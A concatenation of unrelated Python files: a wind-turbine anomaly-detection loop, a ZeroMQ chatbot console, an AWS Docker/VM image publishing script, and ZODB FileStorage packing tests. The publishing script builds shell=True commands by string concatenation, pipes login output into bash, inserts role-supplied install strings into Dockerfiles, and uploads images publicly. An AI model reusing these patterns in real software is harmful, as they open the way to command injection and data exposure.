# then we load the thresholds computed in the training notebook
# for more info, take a look on the Notebook #2
self.thresholds = np.load(f'{self.artifacts_path}/thresholds.npy')
# configurations to format the time based data for the anomaly detection model
# If you change these parameters you need to retrain your model with the new parameters
self.INTERVAL = 5 # seconds
self.TIME_STEPS = 20 * self.INTERVAL # 50ms -> seg: 50ms * 20
self.STEP = 10
# these are the features used in this application
self.feature_ids = [8, 9, 10, 7, 22, 5, 6] # qX,qy,qz,qw ,wind_seed_rps, rps, voltage
self.n_features = 6 # roll, pitch, yaw, wind_speed, rotor_speed, voltage
self.running = False # running status
# minimal buffer length for denoising. We need to accumulate some sample before denoising
self.min_num_samples = 500
self.max_buffer_size = 500
for idx in range(n_turbines):
for j in range(self.max_buffer_size):
self.__read_next_turbine_sample__(idx)
def __create_dataset__(self, X, time_steps=1, step=1):
"""
This encodes a list of readings into the correct shape
expected by the model. It uses the concept of a sliding window
"""
Xs = []
for i in range(0, len(X) - time_steps, step):
v = X[i:(i + time_steps)]
Xs.append(v)
return np.array(Xs)
def __euler_from_quaternion__(self, x, y, z, w):
"""
Convert a quaternion into euler angles (roll, pitch, yaw)
roll is rotation around x in radians (counterclockwise)
pitch is rotation around y in radians (counterclockwise)
yaw is rotation around z in radians (counterclockwise)
"""
t0 = +2.0 * (w * x + y * z)
t1 = +1.0 - 2.0 * (x * x + y * y)
roll_x = math.atan2(t0, t1)
t2 = +2.0 * (w * y - z * x)
t2 = +1.0 if t2 > +1.0 else t2
t2 = -1.0 if t2 < -1.0 else t2
pitch_y = math.asin(t2)
t3 = +2.0 * (w * z + x * y)
t4 = +1.0 - 2.0 * (y * y + z * z)
yaw_z = math.atan2(t3, t4)
return roll_x, pitch_y, yaw_z # in radians
def __wavelet_denoise__(self, data, wavelet, noise_sigma):
'''
Filter accelerometer data using wavelet denoising
Modification of F. Blanco-Silva's code at: https://goo.gl/gOQwy5
'''
wavelet = pywt.Wavelet(wavelet)
levels = min(5, (np.floor(np.log2(data.shape[0]))).astype(int))
# Francisco's code used wavedec2 for image data
wavelet_coeffs = pywt.wavedec(data, wavelet, level=levels)
threshold = noise_sigma*np.sqrt(2*np.log2(data.size))
new_wavelet_coeffs = map(lambda x: pywt.threshold(x, threshold, mode='soft'), wavelet_coeffs)
return pywt.waverec(list(new_wavelet_coeffs), wavelet)
def __del__(self):
"""Destructor"""
self.halt()
def is_noise_enabled(self, turbine_id):
return [self.turbines[turbine_id].is_noise_enabled('Vib'),
self.turbines[turbine_id].is_noise_enabled('Rot'),
self.turbines[turbine_id].is_noise_enabled('Vol')]
def __data_prep__(self, turbine_id, buffer):
"""
This method is called for each reading.
Here we do some data prep and accumulate the data in the buffer
for denoising
"""
new_buffer = []
for data in buffer:
roll,pitch,yaw = self.__euler_from_quaternion__(
data[self.feature_ids[0]],data[self.feature_ids[1]],
data[self.feature_ids[2]],data[self.feature_ids[3]]
)
row = [roll,pitch,yaw, data[self.feature_ids[4]],data[self.feature_ids[5]], data[self.feature_ids[6]]]
new_buffer.append(row)
return np.array(new_buffer)
def __prep_turbine_sample__(self, turbine_id, data):
vib_noise,rot_noise,vol_noise = self.is_noise_enabled(turbine_id)
#np.array([8,9,10,7, 22, 5, 6]) # qX,qy,qz,qw ,wind_seed_rps, rps, voltage
if vib_noise: data[self.feature_ids[0:4]] = np.random.rand(4) * 100 # out of the radians range
if rot_noise: data[self.feature_ids[5]] = np.random.rand(1) * 100 # out of the normalized wind range
if vol_noise: data[self.feature_ids[6]] = int(np.random.rand(1)[0] * 10000) # out of the normalized voltage range
self.data_buffer[turbine_id].append(data)
if len(self.data_buffer[turbine_id]) > self.max_buffer_size:
del self.data_buffer[turbine_id][0]
def get_raw_data(self, turbine_id):
assert(turbine_id >= 0 and turbine_id < len(self.data_buffer))
self.__read_next_turbine_sample__(turbine_id)
return self.data_buffer[turbine_id]
def __read_next_turbine_sample__(self, turbine_id):
self.__prep_turbine_sample__(turbine_id, self.turbines[turbine_id].read_next_sample() )
def __detect_anomalies__(self):
"""
Keeps processing the data collected from the turbines
and do anomaly detection. It reports to each turbine the
anomalies detected (through a callback)
"""
while self.running:
# for each turbine, check the buffer
start_time = time.time()
for idx in range(self.n_turbines):
buffer = self.get_raw_data(idx)
if len(buffer) >= self.min_num_samples:
# create a copy & prep the data
data = self.__data_prep__(idx, np.array(buffer) )
if not self.edge_agent.is_model_loaded(self.model_meta[idx]['model_name']):
print('model is not loaded')
continue
# denoise
data = np.array([self.__wavelet_denoise__(data[:,i], 'db6', self.raw_std[i]) for i in range(self.n_features)])
data = data.transpose((1,0))
# normalize
data -= self.mean
data /= self.std
data = data[-(self.TIME_STEPS+self.STEP):]
# create the dataset and reshape it
x = self.__create_dataset__(data, self.TIME_STEPS, self.STEP)
x = np.transpose(x, (0, 2, 1)).reshape(x.shape[0], self.n_features, 10, 10)
# run the model
p = self.edge_agent.predict(self.model_meta[idx]['model_name'], x)
if p is not None:
a = x.reshape(x.shape[0], self.n_features, 100).transpose((0,2,1))
b = p.reshape(p.shape[0], self.n_features, 100).transpose((0,2,1))
# check the anomalies
pred_mae_loss = np.mean(np.abs(b - a), axis=1).transpose((1,0))
values = np.mean(pred_mae_loss, axis=1)
anomalies = (values > self.thresholds)
print("detect anomalies: ", anomalies)
elapsed_time = time.time() - start_time
time.sleep(0.5-elapsed_time)
def load_model(self, model_name, model_version):
logging.info("Loading model %s version %s" % ( model_name, model_version))
model_path = os.environ.get("MODEL_PATH")
ret = self.edge_agent.load_model(model_name, model_path)
if ret is not None:
for device_id in range(self.n_turbines):
self.model_meta[device_id]['model_name'] = model_name
self.model_meta[device_id]['model_path'] = model_path
self.model_meta[device_id]['model_version'] = model_version
def start(self):
"""
Run the main application by creating the Edge Agents, loading the model and
kicking-off the anomaly detector program
"""
self.load_model("WindTurbineAnomalyDetection", "1.0")
if not self.running:
self.running = True
logging.info("Starting the anomaly detector loop...")
# finally start the anomaly detection loop
self.processing = threading.Thread(target=self.__detect_anomalies__)
self.processing.start()
def halt(self):
"""
Destroys the application and halts the agents & turbines
"""
if self.running:
self.running = False
self.processing.join()
|
console.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import cmd
import sys
from multiprocessing import Process
from os.path import abspath, dirname
sys.path.append(abspath(dirname(abspath(__file__)) + '../../../'))
from core.brain.main import Brain, worker
from core.config.settings import PEOPLE
import zmq
class Shell(cmd.Cmd):
"""Simple command processor example."""
prompt = 'smarty-bot > '
def do_prompt(self, line):
"Change the interactive prompt"
self.prompt = line + '> '
def default(self, req):
"""docstring for default"""
context = zmq.Context()
request = {
'request': req,
'from': 'jabber',
'cmd_path': req.split(),
'cmd_args': req,
'sender': PEOPLE['admin']['email'],
'uuid': ''
}
b = Brain()
response = b.react_on(request)
##check workers activity
w = response.get('worker', None)
if w:
w['addr'] = 'ipc:///tmp/smarty-brain-worker-'
p = Process(target=worker, kwargs=w)
p.start()
w['addr'] = 'ipc:///tmp/smarty-brain-worker-%d' % p.pid
ws = context.socket(zmq.REQ)
ws.connect(w['addr'])
ws.send_json({'cmd': 'run'})
response = ws.recv_json()
if response:
print(response['text'])
#cont = response.get('continue', '')
ws.send_json({'cmd': 'terminate'})
ws.close()
p.terminate()
else:
print(response['text'])
def do_EOF(self, line):
return True
if __name__ == '__main__':
Shell().cmdloop()
|
publish.py
|
import subprocess
import json
import multiprocessing
from multiprocessing import Process
from multiprocessing import Lock
import os.path #for basevm check
from threading import Thread
import strutil
import poolb
import sqlite_backend
import aws_utils
#todo actually queue this instead of just spamming them all at once?
from time import sleep
from pprint import pprint
from traceback import print_exc
import tempfile
nbdlock = Lock()
def queue_role_creation(role):
aws_utils.grabAccountNum()
#just starts up a thread
#multiprocess has some issues with the sqlite DB
# t = Process(target=runRoleCreate, args = (role,))
t = Thread(target=runRoleCreate, args = (role,))
t.start()
multiprocessing.active_children()
'''
def queue_efs_creation():
aws_utils.grabAccountNum()
#just starts up a thread
#multiprocess has some issues with the sqlite DB
# t = Process(target=runRoleCreate, args = (role,))
t = Thread(target=runEfsCreate)
t.start()
multiprocessing.active_children()
'''
dockerdir = './docker'
builddir = './dockerbuild'
#vmdir = './vmbuild'
vmdir = './vmcus'
vmorigdir = './vmorig'
vmorigfname = 'virtuevm.qcow2'
vmorig = vmorigdir + '/' + vmorigfname
virtueimagesdir = '/tmp/virtueimages'
virtuevmsdir = '/tmp/virtuevms'
dockfile = ''
def readDockFile():
global dockfile
if not dockfile:
#todo move to a .template
with open(dockerdir + '/' + 'Dockerfile') as f:
dockfile = f.read()
return dockfile
'''
def readEfsFile():
with open(dockerdir + '/' + 'efsfile') as f:
efsfile = f.read()
return efsfile
'''
#verifies that the orig image is there
def getBaseVm():
with nbdlock:
if os.path.isfile(vmorig): #needs to be inside this check to avoid re-generating this multiple times (example, a bunch of roles are created at the start)
return vmorig
vmtemp = vmorig + '.temp'
vmtempfname = vmorigfname + '.temp'
try:
os.remove(vmtemp)
except:
pass
print('Generating base virtuevm image in ' + vmtemp)
#might be able to get this paralellizable up to 16x, but for now we are just going to lock on it
deppy = subprocess.run('for f in /dev/nbd*; do sudo qemu-nbd -d ${f} ; done', shell=True);
#todo auto figure out vm size based on size of virtueimage???????
#todo detect errors with this?
vmcreat = subprocess.run('cd ' + vmorigdir + ' && chmod +x ./alpine-make-vm-image && chmod +x ./alpineconfigure.sh && sudo ./alpine-make-vm-image --image-format qcow2 --image-size 10G -b v3.9 --packages "$(cat alpinepackages)" -c ' + vmtempfname + ' -- ./alpineconfigure.sh', shell=True, check=True);
#shink image and also finalize it
vmconvert = subprocess.run(['qemu-img', 'convert', '-O', 'qcow2', vmtemp, vmorig], check=True)
tsize = os.path.getsize(vmtemp)
fsize = os.path.getsize(vmorig)
print("\ttemp size: " + str(tsize >> 20) + "MB\n\tfinal size: " + str(fsize >> 20) + "MB\n\tdelta size: " + str((tsize - fsize)>>10) + "KB\n")
try:
os.remove(vmtemp)
except:
pass
return vmorig
def roleBake(role):
roleID = role['roleID']
virtuevmfile = roleID +'.qcow2'
srcimg = 'https://s3.amazonaws.com/' + aws_utils.grabVirtueBucket() + '/' + virtuevmfile
dstimg = srcimg + '_baked'
sqlite_backend.global_sqlite_db.role_set_status(role['roleID'], 'baking')
bakeid = strutil.genbakeid()
poolb.poolbake(bakeid,
srcimg, dstimg,
{"bakeID": bakeid},
'VIRTUEID=%s\n' % "BAKE")
while True:
sleep(10)
try:
bb = poolb.bakelist(bakeid = bakeid)
pprint(bb)
if len(bb) > 0 and bb[0].get('state') == 'completed':
break
except:
print_exc()
#ok its baked, lets remove it
poolb.bakedestroy(bakeid)
#todo errors
#this will deprecate runRoleCreate
#this whole thing needs to be wrapped in a try-except
def runRoleCreatePython(role):
registry = aws_utils.grabAccountNum() + '.dkr.ecr.us-east-1.amazonaws.com'
roleID = role['roleID']
#todo this should be maketmp
## repodir = repodir + '/' + roleID
repodir = tempfile.mkdtemp()
virtueimage = virtueimagesdir + '/' + roleID + '.tar'
virtuevmfile = roleID +'.qcow2'
virtuevm = virtuevmsdir + '/' + virtuevmfile
try:
lp = subprocess.run('aws ecr get-login --no-include-email | bash', shell=True, check=True)
# create the repo. it will error if the repo already exists, we dont care
cr = subprocess.run(['aws', 'ecr', 'create-repository', '--repository-name', roleID])
#sync it up?
cr = subprocess.run(['rsync', '--no-relative', '-r', dockerdir + '/', repodir], check=True)
#import dockerfile
mydockfile = readDockFile()
#generate install strings
appstring = ''
pinststring = ''
for z in role['applications']:
if 'install' in z and z['install']:
appstring = appstring + ' ' + z['install'].strip()
if 'postInstall' in z and z['postInstall']:
zimpy = z['postInstall'].replace('\n', ' \\\n')
pinststring = pinststring + '\nRUN ' + zimpy + '\n\n'
#apply them
if appstring:
zappstring = 'RUN apt-get update -y && apt-get install -y ' + appstring
mydockfile = mydockfile.replace('#__INSTALL', zappstring)
if pinststring:
mydockfile = mydockfile.replace('#__POSTINSTALL', pinststring)
#we dont use TARGZ yet
#output dockkrfile
with open(repodir + '/Dockerfile', 'w') as kl:
kl.write(mydockfile)
#build docker image
dbo = subprocess.run(['docker', 'build', '-t', registry + '/' + roleID, repodir + '/'], check=True)
#create VM if a virlet, else just upload it to ecs (else is further down)
sqlite_backend.global_sqlite_db.role_set_status(role['roleID'], 'bundling')
#export it
print("exporting dockerimage")
exd = subprocess.run(['mkdir', '-p', virtueimagesdir])
exp = subprocess.run(['docker', 'tag', registry + '/' + roleID, roleID])
exp = subprocess.run(['docker', 'save', '-o', virtueimage, roleID])
##exu = subprocess.run(['aws', 's3', 'cp', '/tmp/virtuedocks/'+roleID+'.tar', 's3://siege-virtueimages/'+roleID+'.tar'])
vimgsize = os.path.getsize(virtueimage)
print("\tDockerImage size: " + str(vimgsize >> 20) + " MB\n")
orig = getBaseVm()
print('Using orig virtuevm image from ' + orig)
#basically a recreation of bettermakeimage.sh
print("customizing vm now")
exd = subprocess.run(['mkdir', '-p', virtuevmsdir], check = True)
rmer = subprocess.run(['rm', '-f', virtuevm]);
#new, this can be outside the critical lock zone because it will only reach here after getBaseVm returns
cper = subprocess.run(['rsync', '--no-relative', orig, virtuevm], check=True);
#might be able to get this paralellizable up to 16x, but for now we are just going to lock on it
with nbdlock:
deppy = subprocess.run('for f in /dev/nbd*; do sudo qemu-nbd -d ${f} ; done', shell=True);
#todo auto figure out vm size based on size of virtueimage????
# vmcreat = subprocess.run('cd ' + vmdir + ' && chmod +x ./alpine-make-vm-image && chmod +x ./alpineconfigure.sh && sudo ./alpine-make-vm-image --image-format qcow2 --image-size 10G -b v3.9 --packages "$(cat alpinepackages)" --virtueimage "' + virtueimage + '" -c ' + virtuevm + ' -- ./alpineconfigure.sh', shell=True, check=True);
vmcreat = subprocess.run('cd ' + vmdir + ' && chmod +x ./brunchable-image && chmod +x ./alpineconfigure.sh && sudo ./brunchable-image --virtueimage "' + virtueimage + '" -c ' + virtuevm + ' -- ./alpineconfigure.sh', shell=True, check=True);
vmchown = subprocess.run('sudo chown $USER ' + virtueimage, shell=True)
#upload to s3
sqlite_backend.global_sqlite_db.role_set_status(role['roleID'], 'uploading')
vmupload = subprocess.run(['aws', 's3', 'cp', virtuevm, 's3://' + aws_utils.grabVirtueBucket() + '/' + virtuevmfile, '--acl', 'public-read'])
fimgsize = os.path.getsize(virtuevm)
print("\tFinal VirtueImage size: " + str(fimgsize >> 20) + " MB\n")
#bake the bread!
roleBake(role)
#clean up
rmo = subprocess.run(['rm', '-rf', 'app.tar.gz', repodir, virtueimage, virtuevm])
except:
try:
rmo = subprocess.run(['rm', '-rf', 'app.tar.gz', repodir , virtueimage, virtuevm])
except:
pass
raise
#queue a bake
# rmo = subprocess.run(['rm', '-rf', 'app.tar.gz', repodir , '/tmp/virtueimages/'+roleID+'/'])
#force nodes to grab it from s3
#todo make sure no bash escape from this
# kube.runcommandonallnodes('sudo mkdir -p /tmp/virtueimages/'+roleID+'/ && aws s3 cp s3://siege-virtueimages/'+roleID+'.tar /tmp/virtueimages/'+roleID+'/image.tar', sudo=False)
def cleanCache():
try:
subprocess.run(r"""[ ! -z "$(df -P | awk '$6 == "/" && 0+$5 >= 75 {print}')" ] && docker system prune -a -f --volumes""", shell=True, timeout=30)
except:
print_exc()
def runRoleCreate(role):
pprint(role)
for i in range(0, 2):
try:
cleanCache()
runRoleCreatePython(role)
#success
print('Success in creating role\n')
#update the thing
sqlite_backend.global_sqlite_db.role_set_status(role['roleID'], 'ready')
return
except Exception as e:
pprint(e)
print_exc()
sqlite_backend.global_sqlite_db.role_set_status(role['roleID'], 'broken')
#lets trigger a bake i guess
'''
def runEfsCreate():
print("starting efs creation")
for i in range(0, 2):
try:
cleanCache()
runEfsCreatePython()
#success
print('Success in creating Efs\n')
return
except Exception as e:
pprint(e)
print_exc()
'''
#queue_efs_creation()
|
tests.py
|
##############################################################################
#
# Copyright (c) 2006 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
##############################################################################
# Test FileStorage packing sans GC
#
# This module is a bit of a hack. It simply copies and modifies the
# tests affected by the lack of gc in pack.
##############################################################################
import binascii
import ZODB.blob
import ZODB.tests.testblob
import doctest
import time
import unittest
import zc.FileStorage
from ZODB.serialize import referencesf
from zope.testing import setupstack
from ZODB.tests.testFileStorage import FileStorageTests
from ZODB.tests.PackableStorage import pdumps
from ZODB.tests.TransactionalUndoStorage import snooze
from zodbpickle import pickle
class ZCFileStorageTests(FileStorageTests):
blob_dir = None
def setUp(self):
self.open(create=1, packer=zc.FileStorage.packer, blob_dir=self.blob_dir)
def tearDown(self):
self._storage.close()
self._storage.cleanup()
if self.blob_dir:
ZODB.blob.remove_committed_dir(self.blob_dir)
def checkPackAllRevisions(self):
self._initroot()
eq = self.assertEqual
raises = self.assertRaises
# Create a `persistent' object
obj = self._newobj()
oid = obj.getoid()
obj.value = 1
# Commit three different revisions
revid1 = self._dostoreNP(oid, data=pdumps(obj))
obj.value = 2
revid2 = self._dostoreNP(oid, revid=revid1, data=pdumps(obj))
obj.value = 3
revid3 = self._dostoreNP(oid, revid=revid2, data=pdumps(obj))
# Now make sure all three revisions can be extracted
data = self._storage.loadSerial(oid, revid1)
pobj = pickle.loads(data)
eq(pobj.getoid(), oid)
eq(pobj.value, 1)
data = self._storage.loadSerial(oid, revid2)
pobj = pickle.loads(data)
eq(pobj.getoid(), oid)
eq(pobj.value, 2)
data = self._storage.loadSerial(oid, revid3)
pobj = pickle.loads(data)
eq(pobj.getoid(), oid)
eq(pobj.value, 3)
# Now pack all transactions; need to sleep a second to make
# sure that the pack time is greater than the last commit time.
now = packtime = time.time()
while packtime <= now:
packtime = time.time()
self._storage.pack(packtime, referencesf)
# Only old revisions of the object should be gone. We don't gc
raises(KeyError, self._storage.loadSerial, oid, revid1)
raises(KeyError, self._storage.loadSerial, oid, revid2)
self._storage.loadSerial(oid, revid3)
def checkPackUndoLog(self):
self._initroot()
# Create a `persistent' object
obj = self._newobj()
oid = obj.getoid()
obj.value = 1
# Commit two different revisions
revid1 = self._dostoreNP(oid, data=pdumps(obj))
obj.value = 2
snooze()
packtime = time.time()
snooze()
self._dostoreNP(oid, revid=revid1, data=pdumps(obj))
# Now pack the first transaction
self.assertEqual(3, len(self._storage.undoLog()))
self._storage.pack(packtime, referencesf)
# The undo log contains only the most resent transaction
self.assertEqual(3, len(self._storage.undoLog()))
def checkPackWithGCOnDestinationAfterRestore(self):
pass
def checkPackWithMultiDatabaseReferences(self):
pass
class ZCFileStorageTestsWithBlobs(ZCFileStorageTests):
blob_dir = "blobs"
time_hack_template = """
now = 1268166473.0
import time
time_time, time_sleep = time.time, time.sleep
time.sleep(1) # Slow things down a bit to give the test time to commit
def faux_time():
global now
now += 1
return now
def faux_sleep(x):
logging.info('sleep '+ repr(x))
time.time, time.sleep = faux_time, faux_sleep
"""
GIG_hack_template = """
import sys
sys.path[:] = %(syspath)r
import zc.FileStorage
zc.FileStorage.GIG = 100
"""
def test_pack_sleep():
"""
Make sure that sleep is being called. :)
Mess with time -- there should be infrastructure for this!
>>> exec(time_hack_template)
>>> time.sleep = time_sleep
>>> import os, threading, transaction, shutil, ZODB.FileStorage, zc.FileStorage
>>> fs = ZODB.FileStorage.FileStorage('data.fs',
... packer=zc.FileStorage.packer1)
>>> db = ZODB.DB(fs)
>>> conn = db.open()
>>> for i in range(5):
... conn.root()[i] = conn.root().__class__()
... transaction.commit()
>>> pack_time = time.time()
>>> for i in range(5):
... conn.root()[i].x = 1
... transaction.commit()
>>> pack_script_template = zc.FileStorage.pack_script_template
>>> zc.FileStorage.pack_script_template = (
... time_hack_template + GIG_hack_template + pack_script_template)
>>> thread = threading.Thread(target=fs.pack, args=(pack_time, now))
>>> thread.start()
>>> for i in range(100):
... if os.path.exists('data.fs.packscript'):
... break
... time.sleep(0.01)
>>> def faux_sleep(x):
... print('sleep '+repr(x))
>>> time.sleep = faux_sleep
>>> conn.root().x = 1
>>> transaction.commit()
>>> thread.join()
sleep 1.0
>>> fs.close()
>>> with open('data.fs.packlog') as fd:
... print(fd.read()) # doctest: +NORMALIZE_WHITESPACE
2010-03-09 15:27:55,000 root INFO packing to 2010-03-09 20:28:06.000000,
sleep 1
2010-03-09 15:27:57,000 root INFO read 162
2010-03-09 15:27:59,000 root INFO sleep 2.0
2010-03-09 15:28:01,000 root INFO read 411
2010-03-09 15:28:03,000 root INFO sleep 2.0
2010-03-09 15:28:05,000 root INFO read 680
2010-03-09 15:28:07,000 root INFO sleep 2.0
2010-03-09 15:28:09,000 root INFO read 968
2010-03-09 15:28:11,000 root INFO sleep 2.0
2010-03-09 15:28:13,000 root INFO read 1275
2010-03-09 15:28:15,000 root INFO sleep 2.0
2010-03-09 15:28:17,000 root INFO read 1601
2010-03-09 15:28:19,000 root INFO sleep 2.0
2010-03-09 15:28:21,000 root INFO initial scan 6 objects at 1601
2010-03-09 15:28:22,000 root INFO copy to pack time
2010-03-09 15:28:24,000 root INFO read 162
2010-03-09 15:28:26,000 root INFO sleep 2.0
2010-03-09 15:28:28,000 root INFO read 411
2010-03-09 15:28:30,000 root INFO sleep 2.0
2010-03-09 15:28:32,000 root INFO read 680
2010-03-09 15:28:34,000 root INFO sleep 2.0
2010-03-09 15:28:36,000 root INFO read 968
2010-03-09 15:28:38,000 root INFO sleep 2.0
2010-03-09 15:28:40,000 root INFO read 1275
2010-03-09 15:28:42,000 root INFO sleep 2.0
2010-03-09 15:28:44,000 root INFO read 1601
2010-03-09 15:28:46,000 root INFO sleep 2.0
2010-03-09 15:28:47,000 root INFO copy from pack time
2010-03-09 15:28:51,000 root INFO sleep 1.0
2010-03-09 15:28:52,000 root INFO read 1737
2010-03-09 15:28:54,000 root INFO sleep 5.0
2010-03-09 15:28:58,000 root INFO sleep 1.0
2010-03-09 15:28:59,000 root INFO read 1873
2010-03-09 15:29:01,000 root INFO sleep 5.0
2010-03-09 15:29:05,000 root INFO sleep 1.0
2010-03-09 15:29:06,000 root INFO read 2009
2010-03-09 15:29:08,000 root INFO sleep 5.0
2010-03-09 15:29:12,000 root INFO sleep 1.0
2010-03-09 15:29:13,000 root INFO read 2145
2010-03-09 15:29:15,000 root INFO sleep 5.0
2010-03-09 15:29:19,000 root INFO sleep 1.0
2010-03-09 15:29:20,000 root INFO read 2281
2010-03-09 15:29:22,000 root INFO sleep 5.0
2010-03-09 15:29:23,000 root INFO packscript done
>>> time.sleep = time_sleep
>>> time.time = time_time
Now do it all again with a longer sleep:
>>> _ = shutil.copyfile('data.fs.old', 'data.fs')
>>> fs = ZODB.FileStorage.FileStorage('data.fs',
... packer=zc.FileStorage.packer2)
>>> fs.pack(pack_time, now)
>>> with open('data.fs.packlog') as fd:
... print(fd.read()) # doctest: +NORMALIZE_WHITESPACE
2010-03-09 15:27:55,000 root INFO packing to 2010-03-09 20:28:06.000000,
sleep 2
2010-03-09 15:27:57,000 root INFO read 162
2010-03-09 15:27:59,000 root INFO sleep 4.0
2010-03-09 15:28:01,000 root INFO read 411
2010-03-09 15:28:03,000 root INFO sleep 4.0
2010-03-09 15:28:05,000 root INFO read 680
2010-03-09 15:28:07,000 root INFO sleep 4.0
2010-03-09 15:28:09,000 root INFO read 968
2010-03-09 15:28:11,000 root INFO sleep 4.0
2010-03-09 15:28:13,000 root INFO read 1275
2010-03-09 15:28:15,000 root INFO sleep 4.0
2010-03-09 15:28:17,000 root INFO read 1601
2010-03-09 15:28:19,000 root INFO sleep 4.0
2010-03-09 15:28:21,000 root INFO initial scan 6 objects at 1601
2010-03-09 15:28:22,000 root INFO copy to pack time
2010-03-09 15:28:24,000 root INFO read 162
2010-03-09 15:28:26,000 root INFO sleep 4.0
2010-03-09 15:28:28,000 root INFO read 411
2010-03-09 15:28:30,000 root INFO sleep 4.0
2010-03-09 15:28:32,000 root INFO read 680
2010-03-09 15:28:34,000 root INFO sleep 4.0
2010-03-09 15:28:36,000 root INFO read 968
2010-03-09 15:28:38,000 root INFO sleep 4.0
2010-03-09 15:28:40,000 root INFO read 1275
2010-03-09 15:28:42,000 root INFO sleep 4.0
2010-03-09 15:28:44,000 root INFO read 1601
2010-03-09 15:28:46,000 root INFO sleep 4.0
2010-03-09 15:28:47,000 root INFO copy from pack time
2010-03-09 15:28:51,000 root INFO sleep 2.0
2010-03-09 15:28:52,000 root INFO read 1737
2010-03-09 15:28:54,000 root INFO sleep 10.0
2010-03-09 15:28:58,000 root INFO sleep 2.0
2010-03-09 15:28:59,000 root INFO read 1873
2010-03-09 15:29:01,000 root INFO sleep 10.0
2010-03-09 15:29:05,000 root INFO sleep 2.0
2010-03-09 15:29:06,000 root INFO read 2009
2010-03-09 15:29:08,000 root INFO sleep 10.0
2010-03-09 15:29:12,000 root INFO sleep 2.0
2010-03-09 15:29:13,000 root INFO read 2145
2010-03-09 15:29:15,000 root INFO sleep 10.0
2010-03-09 15:29:19,000 root INFO sleep 2.0
2010-03-09 15:29:20,000 root INFO read 2281
2010-03-09 15:29:22,000 root INFO sleep 10.0
2010-03-09 15:29:26,000 root INFO sleep 2.0
2010-03-09 15:29:27,000 root INFO read 2514
2010-03-09 15:29:29,000 root INFO sleep 10.0
2010-03-09 15:29:30,000 root INFO packscript done
>>> zc.FileStorage.pack_script_template = pack_script_template
"""
def data_transform_and_untransform_hooks():
r"""The Packer factory takes uptions to transform and untransform data
This is helpful when data records aren't raw pickles or when you want
to transform them so that they aren't raw pickles. To test this,
we'll take a file storage database and convert it to use the
ZODB.tests.hexstorage trandormation.
>>> import os, ZODB.FileStorage
>>> db = ZODB.DB(ZODB.FileStorage.FileStorage(
... 'data.fs', blob_dir='blobs',
... packer=zc.FileStorage.Packer(
... transform='zc.FileStorage.tests:hexer',
... untransform='zc.FileStorage.tests:unhexer',
... )))
>>> conn = db.open()
>>> conn.root.b = ZODB.blob.Blob(b'test')
>>> conn.transaction_manager.commit()
>>> with conn.root.b.open() as fd:
... _ = fd.read()
So, here we have some untransformed data. Now, we'll pack it:
>>> db.pack()
Now, the database records are hex:
>>> db.storage.load(b'\0'*8)[0][:50]
'.h6370657273697374656e742e6d617070696e670a50657273'
>>> db.storage.load(b'\0'*7+b'\1')[0][:50]
'.h635a4f44422e626c6f620a426c6f620a71012e4e2e'
Let's add an object. (WE get away with this because the object's we
use are in the cache. :)
>>> conn.root.a = conn.root().__class__()
>>> conn.transaction_manager.commit()
Now the root and the new object are not hex:
>>> db.storage.load(b'\0'*8)[0][:50]
'cpersistent.mapping\nPersistentMapping\nq\x01.}q\x02U\x04data'
>>> db.storage.load(b'\0'*7+b'\2')[0][:50]
'cpersistent.mapping\nPersistentMapping\nq\x01.}q\x02U\x04data'
We capture the current time as the pack time:
>>> import time
>>> pack_time = time.time()
>>> time.sleep(.1)
We'll throw in a blob modification:
>>> with conn.root.b.open('w') as fd:
... _ = fd.write(b'test 2')
>>> conn.transaction_manager.commit()
Now pack and make sure all the records have been transformed:
>>> db.pack()
>>> from ZODB.utils import p64
>>> for i in range(len(db.storage)):
... if db.storage.load(p64(i))[0][:2] != '.h':
... print(i)
We should have only one blob file:
>>> nblobs = 0
>>> for _, _, files in os.walk('blobs'):
... for file in files:
... if file.endswith('.blob'):
... nblobs += 1
>>> nblobs
1
"""
def snapshot_in_time():
r"""We can take a snapshot in time
This is a copy of a database as of a given time and containing
only current records as of that time.
First, we'll hack time:
>>> import logging, os
>>> exec(time_hack_template)
Next, we'll create a file storage with some data:
>>> import ZODB.FileStorage
>>> import transaction
>>> conn = ZODB.connection('data.fs')
>>> for i in range(5):
... conn.root()[i] = conn.root().__class__()
... transaction.commit()
>>> for i in range(5):
... conn.root()[i].x = 0
... transaction.commit()
>>> for j in range(10):
... for i in range(5):
... conn.root()[i].x += 1
... transaction.commit()
>>> import ZODB.TimeStamp
>>> copy_time = ZODB.TimeStamp.TimeStamp(
... conn.db().storage.lastTransaction())
>>> for j in range(10):
... for i in range(5):
... conn.root()[i].x += 1
... transaction.commit()
We'll comput a hash of the old file contents:
>>> import hashlib
>>> with open('data.fs', 'rb') as fd:
... hash = hashlib.sha1(fd.read()).digest()
OK, we have a database with a bunch of revisions.
Now, let's make a snapshot:
>>> import zc.FileStorage.snapshotintime
>>> copy_time = '%s-%s-%sT%s:%s:%s' % (
... copy_time.year(), copy_time.month(), copy_time.day(),
... copy_time.hour(), copy_time.minute(), int(copy_time.second()))
>>> zc.FileStorage.snapshotintime.main(
... ['data.fs', copy_time, 'snapshot.fs'])
>>> sorted(os.listdir('.')) # doctest: +NORMALIZE_WHITESPACE
['data.fs', 'data.fs.index', 'data.fs.lock', 'data.fs.tmp',
'snapshot.fs', 'snapshot.fs.index']
The orginal file is unchanged:
>>> with open('data.fs', 'rb') as fd:
... hashlib.sha1(fd.read()).digest() == hash
True
The new file has just the final records:
>>> for t in ZODB.FileStorage.FileIterator('snapshot.fs'):
... print(ZODB.TimeStamp.TimeStamp(t.tid))
... for record in t:
... print(repr(record.oid))
2010-03-09 20:28:05.000000
'\x00\x00\x00\x00\x00\x00\x00\x00'
2010-03-09 20:28:56.000000
'\x00\x00\x00\x00\x00\x00\x00\x01'
2010-03-09 20:28:57.000000
'\x00\x00\x00\x00\x00\x00\x00\x02'
2010-03-09 20:28:58.000000
'\x00\x00\x00\x00\x00\x00\x00\x03'
2010-03-09 20:28:59.000000
'\x00\x00\x00\x00\x00\x00\x00\x04'
